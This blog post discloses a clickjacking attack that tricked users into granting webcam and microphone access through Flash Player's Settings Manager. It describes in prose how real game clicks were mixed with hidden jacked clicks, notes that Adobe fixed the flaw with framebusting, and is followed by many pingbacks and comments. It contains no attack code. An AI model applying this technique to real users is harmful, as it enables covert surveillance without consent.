Malicious camera spying using ClickJacking
Update: Adobe has fixed this issue by framebusting the Settings Manager pages. Now, 99.9% of the users are protected from this specific exploit. Congrats on the fast response. —-
Turn every browser into a surveillance zombie. The wet dream of every private eye and peeping tom. Imagine this scenario, you play a short game on the web and by doing that you unknowingly grant someone full access to your webcam and microphone.
I’ve made a live demo of it in here, this demo won’t listen or record any of your input.
If you don’t want to try it or don’t have a webcam connected, then check out the video.
[kml_flashembed movie="www.youtube.com/v/gxyLbpldmuU" /]
When I’ve first heard about ClickJacking and how Adobe is concerned about it, I thought that the Flash Player Security Dialog must have been compromised. But the Security Dialog does a good job disabling itself when you try to mess with it’s visibility through DHTML. Unless there’s some 0-day issue with the Dialog it’s probably relatively safe.
The problem here is the Flash Player Setting Manager, this inheritance from Macromedia might be the Flash Player security Achilles heel.
I’ve written a quick and dirty Javascript game that exploit just that, and demonstrate how an attacker can get a hold of the user’s camera and microphone. This can be used, for example, with platform like ustream, justin and alike or to stream to a private server to create a malicious surveillance platform.
I’ve made it as a JS game to make it easier to understand, but, bear in mind that every Flash, Java, SilverLight, DHTML game or application can be used to achieve the same thing.
Some of the clicks are real game clicks other are jacked clicks. Every time the click is needed to be jacked the content simply move behind the br using z-index
I had doubts about publishing this, but, if I could have understand it so are the bad guys, so it’s better to know about it.
In this case Adobe could have just framebust the pages that holds the Settings Manager. There are two issues with frambusting in this case, it won’t solve all cases (legacy browsers for ex) and will force Adobe to rely on javascript.
Play it here, watch it here
100 thoughts on “Malicious camera spying using ClickJacking”
nice PoC
Impressive. Thanks for sharing.
Pingback: Zero Day mobile edition
Pingback: Details of Clickjacking Attack Revealed With Online Spying Demo - Desktop Security News Analysis - Dark Reading
Pingback: hackademix.net » Hello ClearClick, Goodbye Clickjacking!
Pingback: Monyer’s Training Notes » Blog Archive » Clickjacking Details
Pingback: Clickjacking Details | ??'s Blog
Pingback: Hello ClearClick, Goodbye Clickjacking! | ??'s Blog
Pingback: Clickjacking here’s how it works | Ugh!!'s Greymatter Honeypot
Pingback: Clickjacking Details | ???
Pingback: Hello ClearClick, Goodbye Clickjacking! | ???
Pingback: Revelan vulnerabilidad clickjacking - Foros de CHW
Pingback: Clickjacking Attack Revealed
Pingback: Hit the button, Jack! « partikelfernsteuerung
Pingback: The WHATWG Blog » Blog Archive » This Week in HTML 5 - Episode 8
Pingback: Midnight Research Labs - Clickjacking details released
This seems really wet dream for spywares
Hope all the browser soon find a way to fix the way they handle br.
Pingback: Clickjacking for spying? | Maestro Security Blogs
Pingback: Clickjacking: One click to cam spy | The Blog Pirate
Pingback: ClickJacking | Aplikacje internetowe
plugins are always vulnerable. Many 0days still out there
Pingback: Video: l’uso del Clickjacking per spiare gli utenti ignari | Blog.makernet.it
Pingback: Click jacking - Xtreme CPU
Pingback: "Clickjacking" Details Emerge | Student Tech News
This is Dong-bin(Elisabeth) Kim and I’m a reporter of Information Security 21C, mothly magazine, and Boan news, internet daily news site.
I’m very impressed, so I’d like to introduce your PoC via our magazine.
So, if you’re O.K, I’d like to capture you PoC and put it into our magazine.
Please send comment to me.
Pingback: Firefox Extension Blocks Clickjacking! | TekBlog
Pingback: Liquidmatrix Security Digest » Security Briefing: October 8th (Late Edition)
Pingback: Clickjacking peligrosa vulnerabilidad de los navegadores modernos | AtajoTV
Pingback: Clickjacking Attack Lets Web Sites See, Hear You |
Pingback: Clickjacking : une faille de sécurité touchant Adobe Flash Player
Pingback: “Clickjacking” Details Emerge | Syber News
Really nice PoC !
blah, this was demonstrated by a DOD security expert YEARS ago. Man, get with the times.
Pingback: ???????????? ??????????? ????? Clickjacking | Raz0r.name - ???? ? web-????????????
Pingback: TechOnlineNews.com » Adobe stopft Flash-Player-Lücke
Pingback: La France d’en bas » Blog Archive » Le ClickJacking utilise flash pour vous filmer à votre insu
Pingback: ClickJacking Exploit : FraudO.com
Pingback: Apukeittiö.fi » Blog Archive » ClickJacking tai UI Redressing
Pingback: ew-bloggt » Forscher enthüllen Details zu Clickjacking-Attacken
Pingback: ????????????????????? - GENMICHA | ????
Pingback: ® NoScript - Addon untuk Mencegah ClickJacking
Pingback: Ajaxian » This Week in HTML 5: Web Forms 2, Search, and more
Pingback: Security Ninja Blog | Clickjacking
Pingback: ???? ????? » ???? » Hello ClearClick, Goodbye Clickjacking! - ???? ?????
In fact, Macromedia’s Framekiller does not seem to help at all, as the settings manager’s flash-movie itself can still be loaded into an br. Have a quick look at this derivate of your PoC: kugelfisch.bplaced.net/game.html
Pingback: Adobe’s Workaround for “Clickjacking” Issue, and What You Can Do Now
Pingback: Adobe fixes ‘clickjacking’ flaw | TechHairBall.com
Pingback: Telecom,Security & P2P » [Chinese]clickjacking??
Pingback: Clickjacking: Potentially harmful web browser exploit | Network Administrator | TechRepublic.com
looking forward for more information about this. thanks for sharing. Eugene
Pingback: El Clickjacking y como afecta a las instituciones « robert dice…
Pingback: Flash Security: Clickjacking the Webcam : TroyWorks
Pingback: Clickjacking Details | Small Business System
Pingback: Application Security Talk » Clickjacking: Do you see what I see?
Click Jacking has long since been called by search engine marketers… u need a new term.
what click jacking really is is swapping in your own ads into someone elses page often by overlaying or using javascript or filtering their content
Pingback: Preventing Clickjacking with Framebusting - KeepItLocked.net
Pingback: Moja prednáška na WebExpo Praha 2008
Pingback: Packets of Consciousness » Clearjacking: So How Fun is This, Now?
Yeah I would hate for this too happen -www.pricelessweddings.com.au as I would be caught pants down
Pingback: Marco’s Webdev Notepad » Blog Archive » Clickjacking
Pingback: Brown Tips » Blog Archive » What IS ClickJacking
Pingback: Prominent Security » Twitter, and the Popularity of Clickjacking.
ction, please visit the blog post of Flash developer Guy Aharonovsky, where he demonstrates in a video how a user unintentionally changes his browser’s security settings while playing a JavaScript
Pingback: Flash + Internet = Big Brother is watching you
Pingback: Dipl.-Inform. Carsten Eilers
Pingback: Dipl.-Inform. Carsten Eilers
Pingback: John Smith’s younger brother, Adam | GUYA.NET
what click jacking really is is swapping in your own ads into someone elses page often by overlaying or using javascript or filtering their content?
Pingback: Preventing Clickjacking with Framebusting | Keep It Locked
Hiya! I just would like to give an enormous thumbs up for the nice data you could have here on this post. I will be coming back to your weblog for more soon.